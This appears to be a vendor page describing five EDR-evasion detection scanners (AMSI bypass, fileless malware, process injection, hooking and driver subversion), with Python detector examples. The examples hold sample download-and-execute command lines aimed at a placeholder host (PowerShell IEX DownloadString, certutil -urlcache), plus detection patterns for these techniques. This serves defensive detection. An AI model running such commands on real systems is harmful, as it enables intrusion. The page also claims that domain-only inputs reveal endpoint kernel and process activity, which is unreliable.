
EDR Evasion

5 automated security scanners


Purpose: The Driver-level Subversion Scanner is designed to detect potential EDR (Endpoint Detection and Response) evasion techniques by identifying kernel callbacks, filter drivers, and direct syscalls that may be used by malicious actors to conceal their activities from security monitoring systems.

What It Detects:

  • Kernel Callbacks: Identifies suspicious modifications or hooks in the system’s kernel callback functions, which can indicate evasion techniques.
  • Filter Drivers: Detects unauthorized filter drivers that could intercept and modify I/O operations without proper authorization, potentially used for data interception.
  • Direct Syscalls: Looks for direct system call usage that bypasses normal API layers, a common method to evade detection by security software.
  • Threat Indicators from Threat Intelligence Feeds: Scans for known vulnerabilities and malicious activities associated with the target domain using threat intelligence sources like Shodan, VirusTotal, CISA KEV, and others, helping in identifying potential threats.
  • Exposure Indicators: Identifies signs of data exposure or unauthorized access that could be related to EDR evasion attempts, aiding in security monitoring and response.

Inputs Required:

  • domain (string): The primary domain to analyze (e.g., acme.com). This input is crucial for fetching relevant threat intelligence data from Shodan and VirusTotal.

Business Impact: Detecting unauthorized modifications to kernel callbacks, filter drivers, and direct syscalls can significantly enhance the security posture of an organization by preventing potential data breaches and evasion of endpoint detection systems, thereby protecting sensitive information and maintaining regulatory compliance.

Risk Levels:

  • Critical: The scanner identifies unauthorized alterations in critical system components such as kernel callbacks and filter drivers, which could lead to a complete compromise of system integrity.
  • High: Direct syscall usage that bypasses standard API layers poses a high risk of evading security software detection, potentially leading to significant data exposure or unauthorized access.
  • Medium: Vulnerabilities identified through threat intelligence feeds, such as CVE entries, indicate potential risk if left unaddressed and weaken the overall security posture.
  • Low: Exposure indicators might suggest minor issues such as accidental data leakage but do not pose a critical risk unless compounded with other vulnerabilities.
  • Info: Informational findings from threat intelligence sources provide basic insight into domain exposure and potential threats; on their own they are generally benign.

Example Findings:

  1. A filter driver detected on the system, which could potentially intercept sensitive data flows without proper authorization.
  2. Evidence of direct syscall usage in a critical application, indicating an attempt to evade standard security monitoring tools.

Purpose: The AMSI Script Blocking Bypass Scanner is designed to evaluate the effectiveness of Antimalware Scan Interface (AMSI) script blocking mechanisms by identifying known bypass techniques and indicators associated with malicious activities. This tool helps in assessing potential security risks posed by scripts that attempt to evade AMSI protections, ensuring a robust defense against malware and other threats.

What It Detects:

  • AMSI Bypass Techniques: The scanner detects specific code patterns designed to disable or bypass AMSI and identifies obfuscated scripts containing AMSI-related keywords.
  • Malware Indicators: It searches for known malware signatures in the provided domain and analyzes for indicators of ransomware, trojans, and phishing activities.
  • Command and Control (C2) Activity: The scanner identifies patterns indicative of C2 communication channels through suspicious network traffic or domains.
  • Phishing and Credential Harvesting: It examines content for phishing indicators and detects attempts to harvest credentials, both of which are critical in preventing unauthorized access and data exfiltration.
  • Vulnerability Indicators: The tool scans for known vulnerabilities using CVE identifiers and assesses exposed services for potential security weaknesses.

Inputs Required:

  • domain (string): Primary domain to analyze (e.g., acme.com). This input is essential for the scanner to target specific domains for analysis, ensuring focused assessments of relevant systems and data.

Business Impact: The effectiveness of AMSI in preventing malicious scripts from executing can significantly impact an organization’s security posture. By identifying bypass techniques early, this scanner helps organizations mitigate risks associated with malware infections and unauthorized access attempts, safeguarding critical assets and maintaining the integrity of their digital environments.

Risk Levels:

  • Critical: The risk is considered critical when the scanner detects active bypass techniques that have successfully evaded AMSI mechanisms, posing a direct threat to system security and stability.
  • High: High risks are associated with malware indicators such as ransomware or trojans present in the analyzed domain, indicating potential severe damage and data loss scenarios.
  • Medium: Medium risk findings involve phishing content or credential harvesting activities that could lead to unauthorized access but do not pose an immediate critical threat.
  • Low: Low risk findings pertain to vulnerabilities identified through CVE scanning, which may indicate areas for improvement in system configuration and software patching.
  • Info: Informational findings are those that provide insights into potential risks without being directly indicative of active threats or significant vulnerabilities.

Example Findings:

  • Critical: “Detected obfuscated script attempting to disable AMSI.” This finding highlights a sophisticated attempt by malware to evade detection, posing a high risk for unmonitored execution on systems.
  • High: “Found known malware signature in VirusTotal data.” This example indicates the presence of specific malware signatures that are indicative of active infections or potential future threats.

Purpose: The Fileless Malware Detection Scanner is designed to detect and identify memory-only execution and living-off-the-land techniques used by malware, which aim to evade traditional file-based detection methods. This scanner focuses on detecting processes that execute in memory without writing files to disk, using indicators such as reflective DLL injection, suspicious command-line arguments, and anomalous process behavior.

What It Detects:

  • Memory-Only Execution Indicators: The scanner identifies processes that use reflective DLL injection, which is a technique where malware injects itself into the memory space of another running process to execute its code. It also looks for the use of PowerShell or other scripting languages executing commands directly from memory, which can be indicative of malicious activity.
  • Living-off-the-Land Techniques: The scanner detects the abuse of legitimate system tools like certutil and powershell for malicious purposes. It identifies the misuse of Windows Management Instrumentation (WMI) and other built-in utilities to carry out unauthorized activities.
  • Threat Intelligence Indicators: Utilizing APIs such as Shodan, VirusTotal, CISA KEV, AbuseIPDB, and querying databases like NVD/CVE, the scanner collects intelligence on exposed services, domain/IP reputation, known exploited vulnerabilities, and more to detect potential threats.
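The living-off-the-land checks above (PowerShell running code straight from memory, certutil and WMI turned to unintended purposes) come down to command-line analysis. The following is an added example of that logic, not the scanner's own code: it decodes a PowerShell -EncodedCommand argument (base64 over UTF-16LE, which is what PowerShell expects), scans both the outer command line and the decoded script against indicator patterns, and rates the result on the page's scale (High for legitimate tools used for execution or download, Medium for suspicious launch arguments alone, Info otherwise). The command lines are constructed samples, and the indicator names are this example's own.

```python
import base64
import re

# Patterns that indicate a legitimate tool being used to fetch or run code
# outside the normal file-based path (rated High when present).
EXECUTION_PATTERNS = {
    # Script pulled over the network and run in memory, never written to disk.
    "download_to_memory": re.compile(
        r"\b(iex|invoke-expression)\b.*\b(downloadstring|downloaddata|invoke-webrequest|iwr)\b"
        r"|\b(downloadstring|downloaddata|invoke-webrequest|iwr)\b.*\b(iex|invoke-expression)\b",
        re.I | re.S),
    # .NET assembly loaded from a byte array (reflective loading).
    "reflective_assembly_load": re.compile(r"\[\s*(system\.)?reflection\.assembly\s*\]\s*::\s*load", re.I),
    # certutil repurposed as a downloader or base64 decoder.
    "certutil_download": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I),
    "certutil_decode": re.compile(r"\bcertutil(\.exe)?\b.*-decode", re.I),
    # WMI used to spawn a process.
    "wmi_process_create": re.compile(
        r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b|\bwin32_process\b.*\bcreate\b|\binvoke-wmimethod\b.*\bcreate\b",
        re.I | re.S),
}
# Launch arguments that hide or loosen execution (rated Medium on their own).
ARGUMENT_PATTERNS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
    "execution_policy_bypass": re.compile(r"-ex(ecutionpolicy)?\s+bypass\b", re.I),
    "encoded_command": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...).
ENCODED_FLAG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(command_line):
    """Return the script behind a -EncodedCommand argument, or None if absent/undecodable."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped base64 padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_powershell_command(script):
    """Used only to build the constructed sample: PowerShell wants base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_command_line(command_line):
    """Rate one process command line; decoded script text is scanned as well."""
    decoded = decode_encoded_command(command_line)
    text = command_line if decoded is None else command_line + "\n" + decoded
    indicators = [name for name, pat in ARGUMENT_PATTERNS.items() if pat.search(command_line)]
    indicators += [name for name, pat in EXECUTION_PATTERNS.items() if pat.search(text)]
    if any(name in EXECUTION_PATTERNS for name in indicators):
        risk = "High"
    elif indicators:
        risk = "Medium"
    else:
        risk = "Info"
    return {"command_line": command_line, "risk": risk, "indicators": indicators, "decoded": decoded}


# Constructed sample command lines (not real telemetry); example.test is a placeholder host.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -File C:\Scripts\backup.ps1",
    "powershell.exe -w hidden -nop -enc "
    + encode_powershell_command("IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"),
    r"certutil.exe -urlcache -split -f http://example.test/payload.txt C:\Users\Public\p.txt",
    'wmic.exe process call create "notepad.exe"',
    "powershell.exe -ExecutionPolicy Bypass -Command Get-Date",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = analyze_command_line(line)
        print(f"{result['risk']:<8} {result['indicators']}  <- {line[:60]}")
```

Decoding the encoded argument before matching is the step that matters: the outer command line of the second sample shows only launch flags, while the download-and-execute pattern lives entirely inside the base64 blob.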

Inputs Required:

  • domain (string): The primary domain to analyze, which helps in gathering threat intelligence related to the specified domain.

Business Impact: This scanner is crucial for organizations aiming to enhance their security posture by detecting advanced persistent threats that operate without leaving traces on disk. It aids in identifying potential breaches and malicious activities early, thereby minimizing damage and enhancing overall cybersecurity resilience.

Risk Levels:

  • Critical: Findings include indicators of critical vulnerabilities such as CVE entries directly referencing malware or ransomware strains.
  • High: The scanner identifies the use of well-known legitimate tools for malicious intent, indicating a high risk of exploitation and potential unauthorized access to systems.
  • Medium: Detects suspicious command-line arguments associated with known living-off-the-land tactics, which could lead to stealthy malware activities without triggering immediate critical alerts.
  • Low: Low-risk findings may include exposure indicators such as leaked data or unauthorized access attempts, which pose less severe risk than the higher levels.
  • Info: Provides basic domain reputation checks and vulnerability scans that are primarily informative but help in understanding the baseline network posture.

Risk levels are inferred based on the severity of detected threats and potential impact on system security.

Example Findings:

  • A process is identified as using reflective DLL injection, which is a strong indicator of memory-only malware execution.
  • The scanner detects the use of powershell with suspicious command lines that suggest malicious activity, such as credential harvesting or exploitation of WMI services for unauthorized purposes.

Purpose: The Process Injection Techniques Scanner is designed to identify and detect process hollowing, DLL injection, and atom bombing techniques used by malicious actors. These techniques are employed to evade detection and execute unauthorized code within legitimate processes. By analyzing patterns of API usage and memory modifications, the scanner aims to provide insights into potential security threats and aid in incident response efforts.

What It Detects:

  • Process Hollowing Indicators: The scanner looks for indicators such as the creation of a suspended process and attempts to modify the memory space of a running process using APIs like CreateProcess, NtUnmapViewOfSection, and WriteProcessMemory.
  • DLL Injection Indicators: It identifies patterns related to loading external DLLs into processes, including the use of functions such as LoadLibrary, GetProcAddress, and VirtualAllocEx, as well as suspicious API calls like CreateRemoteThread or QueueUserAPC.
  • Atom Bombing Indicators: The scanner searches for patterns indicating the creation and usage of global atoms stored in the Global Atom Table, focusing on APIs such as GlobalAddAtom, GlobalGetAtomName, and SetWindowsHookEx.
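The three indicator groups above are each an ordered sequence of API calls from one process against another, so a detector needs to correlate calls rather than match single names. The block below is an added example of that correlation, not the scanner's own code: it walks a constructed API-call trace grouped by calling process, tracks the target process from the first call that names one, and reports a finding only when every step of a technique's sequence has been seen against that same target. The trace, its field names, and the step lists are this example's own assumptions (the CREATE_SUSPENDED check on process hollowing and the ANSI/Unicode suffix folding are the two details worth noting).

```python
import re
from collections import defaultdict

# Ordered call sequences per technique, following the indicators listed above.
# Each step is (accepted API names, optional predicate on the event).
SIGNATURES = {
    "process_hollowing": [
        ({"CreateProcess", "NtCreateUserProcess"}, lambda e: "CREATE_SUSPENDED" in e.get("flags", "")),
        ({"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}, None),
        ({"WriteProcessMemory", "NtWriteVirtualMemory"}, None),
        ({"ResumeThread", "NtResumeThread"}, None),
    ],
    "remote_dll_injection": [
        ({"VirtualAllocEx", "NtAllocateVirtualMemory"}, None),
        ({"WriteProcessMemory", "NtWriteVirtualMemory"}, None),
        ({"CreateRemoteThread", "NtCreateThreadEx", "QueueUserAPC"}, None),
    ],
    "atom_bombing": [
        ({"GlobalAddAtom"}, None),
        ({"QueueUserAPC", "NtQueueApcThread", "SetWindowsHookEx"}, None),
    ],
}

# Constructed trace; the schema (ts, pid, api, target_pid, flags) is this example's own.
TRACE = [
    {"ts": 1, "pid": 100, "api": "CreateProcessW", "target_pid": 200, "flags": "CREATE_SUSPENDED"},
    {"ts": 2, "pid": 100, "api": "NtUnmapViewOfSection", "target_pid": 200},
    {"ts": 3, "pid": 100, "api": "WriteProcessMemory", "target_pid": 200},
    {"ts": 4, "pid": 100, "api": "ResumeThread", "target_pid": 200},
    {"ts": 5, "pid": 300, "api": "OpenProcess", "target_pid": 400},
    {"ts": 6, "pid": 300, "api": "VirtualAllocEx", "target_pid": 400},
    {"ts": 7, "pid": 300, "api": "WriteProcessMemory", "target_pid": 400},
    {"ts": 8, "pid": 300, "api": "CreateRemoteThread", "target_pid": 400},
    {"ts": 9, "pid": 500, "api": "GlobalAddAtomW", "target_pid": None},
    {"ts": 10, "pid": 500, "api": "QueueUserAPC", "target_pid": 600},
    {"ts": 11, "pid": 700, "api": "CreateProcessW", "target_pid": 800, "flags": ""},   # ordinary launch
    {"ts": 12, "pid": 700, "api": "ResumeThread", "target_pid": 800},
]


def normalize_api(name):
    """Fold ANSI/Unicode variants (CreateProcessA / CreateProcessW) onto one name."""
    return re.sub(r"[AW]$", "", name)


def detect_injection(trace):
    """Return one finding per completed technique sequence, per (source, target) pair."""
    by_source = defaultdict(list)
    for event in sorted(trace, key=lambda e: e["ts"]):
        by_source[event["pid"]].append(event)

    findings = []
    for source_pid, events in by_source.items():
        for technique, steps in SIGNATURES.items():
            idx, target, evidence = 0, None, []
            for event in events:
                apis, predicate = steps[idx]
                if normalize_api(event["api"]) not in apis:
                    continue
                if predicate is not None and not predicate(event):
                    continue
                event_target = event.get("target_pid")
                if target is not None and event_target not in (None, target):
                    continue            # aimed at some other process; keep waiting
                if event_target is not None:
                    target = event_target
                evidence.append(event["api"])
                idx += 1
                if idx == len(steps):
                    # Every step seen in order against one target: the page rates this Critical.
                    findings.append({"technique": technique, "risk": "Critical",
                                     "source_pid": source_pid, "target_pid": target,
                                     "evidence": evidence})
                    idx, target, evidence = 0, None, []
    return findings


if __name__ == "__main__":
    for finding in detect_injection(TRACE):
        print(f"{finding['risk']}: {finding['technique']} pid {finding['source_pid']} -> "
              f"{finding['target_pid']} via {' > '.join(finding['evidence'])}")
```

The ordinary launch by pid 700 produces nothing because CreateProcess without CREATE_SUSPENDED never satisfies the first hollowing step; a production version would also surface incomplete sequences (for instance VirtualAllocEx plus WriteProcessMemory with no thread creation) at the Medium level described below rather than dropping them.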

Inputs Required:

  • domain (string): Primary domain to analyze (e.g., acme.com). This input is essential for directing the scanner’s analysis towards specific targets, enabling it to gather relevant data from external sources like Shodan and VirusTotal.

Business Impact: The detection of process injection techniques by this scanner is crucial as it helps in identifying potential malicious activities within organizations’ networks. By pinpointing unauthorized code execution paths, the scanner contributes significantly to maintaining a secure environment against advanced persistent threats (APTs).

Risk Levels:

  • Critical: The critical risk level pertains to situations where there are clear indications of process injection techniques being actively employed, potentially leading to severe system compromise and data exposure.
  • High: High-risk findings involve significant indicators of malicious activity that could lead to substantial damage or disruption if exploited further.
  • Medium: Medium-risk findings suggest potential vulnerabilities that might be exploitable but do not pose an immediate critical threat.
  • Low: Low-risk findings are generally informational and indicate minimal risk, often associated with benign activities or misconfigurations.
  • Info: Informational findings provide context about the environment without significant security implications.

If specific risk levels are not detailed in the README, they have been inferred based on the purpose of the scanner and its potential impact.

Example Findings: The scanner might flag instances where a process is created but never fully executed, or where external DLLs are loaded into multiple processes without clear business justification. These findings highlight areas that require further investigation to assess their true security posture.


Purpose: The Hooking Detection Evasion Scanner is designed to identify and detect various techniques employed by malware to bypass hooks, perform direct system calls, and utilize alternative API paths in an attempt to evade endpoint detection and response (EDR) systems. This scanner plays a crucial role in enhancing the security posture of organizations by providing insights into potential malicious activities that could go undetected by traditional EDR solutions.

What It Detects:

  • Hook Bypass Techniques: Identifies patterns indicative of hook bypass mechanisms such as UnhookWindowsHookEx, SetWindowsHookExW, and RemoveVectoredExceptionHandler.
  • Direct Syscalls: Detects code that performs direct system calls to avoid EDR hooks, including patterns like syscall; ret, NtCreateThreadEx, and NtAllocateVirtualMemory.
  • Alternative API Paths: Identifies the use of alternative or less common APIs such as RtlMoveMemory, LdrLoadDll, and ZwOpenProcess for performing sensitive operations.
  • Code Injection Indicators: Detects patterns suggesting code injection techniques like VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread.
  • Anti-Debugging Techniques: Identifies anti-debugging mechanisms such as IsDebuggerPresent, CheckRemoteDebuggerPresent, and NtQueryInformationProcess that may be used in conjunction with hook evasion.
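The detections above are static: the scanner looks at code or samples for API names and for the syscall; ret instruction sequence. The block below is an added example of such a static pass, not the scanner's own code. It searches a byte image for the shape of a direct-syscall stub (mov r10, rcx; mov eax, imm32; syscall; ret, which is how a user-mode syscall is normally issued), pulls out the immediate that would be the system call number, extracts printable strings and matches them against the five indicator groups, and then rates the result on the page's scale. The two images are constructed, the syscall number 0x3F in them is arbitrary filler rather than a real table entry, and the category names are this example's own.

```python
import re

# Direct-syscall stub shape: mov r10,rcx ; mov eax,imm32 ; syscall ; ret
STUB_PATTERN = re.compile(rb"\x4c\x8b\xd1\xb8(.{4})\x0f\x05\xc3", re.DOTALL)
SYSCALL_RET = re.compile(rb"\x0f\x05\xc3")          # bare syscall ; ret, any surrounding code
PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")         # ASCII strings of six or more characters

# Indicator groups as listed above.
INDICATORS = {
    "hook_bypass": {"UnhookWindowsHookEx", "SetWindowsHookExW", "RemoveVectoredExceptionHandler"},
    "direct_syscall_api": {"NtCreateThreadEx", "NtAllocateVirtualMemory", "NtWriteVirtualMemory"},
    "alternative_api_path": {"RtlMoveMemory", "LdrLoadDll", "ZwOpenProcess"},
    "code_injection": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "anti_debugging": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess"},
}


def make_stub(ssn):
    """Build the stub bytes for a given syscall number (used only for the constructed sample)."""
    return b"\x4c\x8b\xd1\xb8" + ssn.to_bytes(4, "little") + b"\x0f\x05\xc3"


# Constructed images, not real binaries: a header stub, some name strings, filler, and code.
SUSPICIOUS_IMAGE = (b"MZ" + b"\x00" * 30
                    + b"kernel32.dll\x00LdrLoadDll\x00NtAllocateVirtualMemory\x00"
                    + b"WriteProcessMemory\x00IsDebuggerPresent\x00"
                    + b"\x90" * 8 + make_stub(0x3F) + b"\xcc" * 16)
BENIGN_IMAGE = b"MZ" + b"\x00" * 30 + b"kernel32.dll\x00CreateFileW\x00ReadFile\x00WriteFile\x00"


def rate(hits, stubs):
    """Map indicator groups and stub count onto the page's risk scale."""
    if stubs and "code_injection" in hits:
        return "Critical"      # hook evasion combined with injection primitives
    if stubs or "hook_bypass" in hits or "direct_syscall_api" in hits:
        return "High"          # can bypass common security hooks
    if hits:
        return "Medium"        # supporting techniques (alternative paths, anti-debugging)
    return "Info"              # nothing beyond ordinary API presence


def scan_image(data):
    """Static scan of one byte image: stub detection, string indicators, overall risk."""
    strings = {s.decode("ascii") for s in PRINTABLE.findall(data)}
    hits = {group: sorted(strings & names) for group, names in INDICATORS.items()}
    hits = {group: names for group, names in hits.items() if names}
    stubs = [int.from_bytes(m.group(1), "little") for m in STUB_PATTERN.finditer(data)]
    return {
        "risk": rate(hits, stubs),
        "indicators": hits,
        "syscall_stubs": stubs,                                   # extracted immediates
        "syscall_ret_sequences": len(SYSCALL_RET.findall(data)),
    }


if __name__ == "__main__":
    for label, image in (("suspicious", SUSPICIOUS_IMAGE), ("benign", BENIGN_IMAGE)):
        result = scan_image(image)
        print(f"{label}: {result['risk']}  stubs={[hex(s) for s in result['syscall_stubs']]}  "
              f"indicators={result['indicators']}")
```

Two caveats a reviewer would raise: ntdll.dll itself legitimately contains exactly these stubs, so the stub check is only meaningful for other modules or for memory regions that are not backed by ntdll; and the extracted number cannot be named without the syscall table of the specific Windows build, which is why the example reports it as a raw value.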

Inputs Required:

  • domain (string): The primary domain to analyze, providing the scope of the scan (e.g., acme.com).

Business Impact: This scanner is crucial for organizations concerned with protecting their systems from sophisticated malware that employs evasive techniques to bypass security measures. By identifying and alerting on these patterns, it helps in preventing potential data breaches and maintaining a secure environment against malicious activities.

Risk Levels:

  • Critical: Patterns indicating highly advanced and persistent threats that are difficult to detect by traditional EDR systems.
  • High: Techniques that can bypass common security hooks and may lead to unauthorized access or data theft.
  • Medium: Less sophisticated methods that might be used in conjunction with other evasion techniques, requiring close monitoring.
  • Low: Informal indications of potential issues that could be part of a broader pattern but do not pose an immediate threat.
  • Info: General presence of API calls without clear evidence of malicious intent, useful for baseline analysis and continuous monitoring.

Example Findings:

  1. A sample containing UnhookWindowsHookEx suggests the use of a hook bypass technique that could evade standard security hooks.
  2. The detection of NtCreateThreadEx in code samples indicates potential attempts to perform direct system calls, which is indicative of an evasion strategy against EDR systems.